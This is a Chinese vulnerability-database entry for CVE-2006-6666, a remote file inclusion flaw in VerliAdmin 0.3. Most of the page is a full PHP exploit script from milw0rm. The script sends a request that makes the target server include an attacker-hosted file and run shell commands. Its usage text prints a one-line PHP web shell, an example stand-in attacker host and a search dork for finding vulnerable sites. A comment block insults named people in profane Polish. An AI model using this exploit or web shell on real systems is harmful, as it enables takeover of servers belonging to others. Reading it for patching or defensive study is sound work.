VerliAdmin 'Index.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111792 漏洞类型 输入验证
发布时间 2006-12-18 更新时间 2006-12-21
CVE编号 CVE-2006-6666 CNNVD-ID CNNVD-200612-461
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2944
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-461
|漏洞详情
VerliAdmin0.3及早期版本的index.php脚本存在PHP远程文件包含漏洞,远程认证用户可以借助q参数中的URL执行任意PHP代码。
|漏洞EXP
<?




/*
P.S
Chcialem serdecznie niepozdrowic wszystkie kurwy takie jak Ne0 i jego dziwki!!
Mam was w dupie, a Ty Ne0 pryszczu jebany pogodz sie z porazka bo to ja zawsze bede lepszy od Ciebie!
Nie pozdrawiam tez wszystkie gnidy jakie chowaja sie na swoich smiesznych hubach DC, jestescie poprostu smieszni...
Cale to ZOO pozdrawiam srodkowym palcem
H.W.D.Cale Direct Connect PL  
by Kacper & DEVIL TEAM
*/







//Kacper Settings 
$exploit_name = "VerliAdmin <= 0.3 File Include Exploit";
$script_name = "VerliAdmin 0.3";
$script_site = "http://bohyn.czechweb.cz/";
$dork = 'allinurl:"verliadmin"';
//**************************************************************


print '
:::::::::  :::::::::: :::     ::: ::::::::::: :::        
:+:    :+: :+:        :+:     :+:     :+:     :+:        
+:+    +:+ +:+        +:+     +:+     +:+     +:+        
+#+    +:+ +#++:++#   +#+     +:+     +#+     +#+        
+#+    +#+ +#+         +#+   +#+      +#+     +#+        
#+#    #+# #+#          #+#+#+#       #+#     #+#        
#########  ##########     ###     ########### ########## 
::::::::::: ::::::::::     :::     ::::    ::::  
    :+:     :+:          :+: :+:   +:+:+: :+:+:+ 
    +:+     +:+         +:+   +:+  +:+ +:+:+ +:+ 
    +#+     +#++:++#   +#++:++#++: +#+  +:+  +#+ 
    +#+     +#+        +#+     +#+ +#+       +#+ 
    #+#     #+#        #+#     #+# #+#       #+# 
    ###     ########## ###     ### ###       ### 
	
   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
 

[Exploit name: '.$exploit_name.'
[Script name: '.$script_name.'
[Script site: '.$script_site.'
dork: '.$dork.'

Find by: Kacper (a.k.a Rahim)


========>  DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam  <========
========>         http://www.rahim.webd.pl/            <========

Contact: kacper1964@yahoo.pl

(c)od3d by Kacper
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings DragonHeart and all DEVIL TEAM Patriots :)
- Leito & Leon | friend str0ke ;)

Blund Coder, D0han, d3m0n, D3m0n (ziom z Niemiec :P), dn0de, DUREK5, fdj, Grzegorz, GrZyB997, konsol, Mandr4ke,
mass, michalind, mIvus, Nua, nukedclx, pepi, QunZ, Qw3rty, RebeL, SkD, Adam, arkadius, asteroid, blue, Ci2u, CrazzyIwan,
DMX, drzewko, ExTrEmE][-][ack, Gelo, Kicaj, Larry, Leito, LEON, Michas, Morpheus, MXZ, Ramzes, redsaq, TomZen

 and
 
Dr Max Virus
TamTurk,
hackersecurity.org

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                Greetings for 4ll Fusi0n Group members ;-)
                and all members of hacker.com.pl ;)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
';

if ($argc<6) {
print ('
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Usage: php '.$argv[0].' host shell nick pass cmd OPTIONS
host:      script server (ip/hostname)
shell:     path to shell
nick:      You username in hub
pass:      You username password
cmd:       a shell command (ls -la)
Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost http://www.evilsite.com/shell.txt Hauru zamek ls -la -P1.1.1.1:80
shell.txt: <?php ob_clean();echo"Hacker_Kacper_Made_in_Poland!!..Hauru..^_^..the..best..polish..team..Greetz";ini_set("max_execution_time",0);echo "hauru";passthru($_GET["cmd"]);die;?>
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
');
die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpackets($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}
function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}

$host=$argv[1];
$shell=$argv[2];
$nick=$argv[3];
$password=$argv[4];
$cmd="";

$port=80;
$proxy="";
for ($i=5; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}

if ($proxy=='') {$p='http://'.$host.':'.$port;}

$num1 = Rand(97, 122);
$num2 = Rand(65, 90);
$pass = Crypt($password, Chr($num1).Chr($num2));

$packet ="GET ".$p."index.php?q=".$shell."?cmd=".$cmd."%00 HTTP/1.0\r\n";
$pakiet.="Cookie: brwsr_tp=Opera;\r\n";
$pakiet.="Cookie: lang=pl;\r\n";
$pakiet.="Cookie: login=1;\r\n";
$pakiet.="Cookie: nick=".$nick.";\r\n";
$pakiet.="Cookie: password=".$pass.";\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpackets($packet);
if (strstr($html,"hauru"))
{
$temp=explode("hauru",$html);
die($temp[1]);
}
echo "Exploit err0r :(\n";
echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\n";
?>

# milw0rm.com [2006-12-18]
|参考资料

来源:BID
名称:21640
链接:http://www.securityfocus.com/bid/21640
来源:MILW0RM
名称:2944
链接:http://www.milw0rm.com/exploits/2944
来源:VUPEN
名称:ADV-2006-5059
链接:http://www.frsirt.com/english/advisories/2006/5059
来源:SECUNIA
名称:23418
链接:http://secunia.com/advisories/23418
来源:MILW0RM
名称:2944
链接:http://milw0rm.com/exploits/2944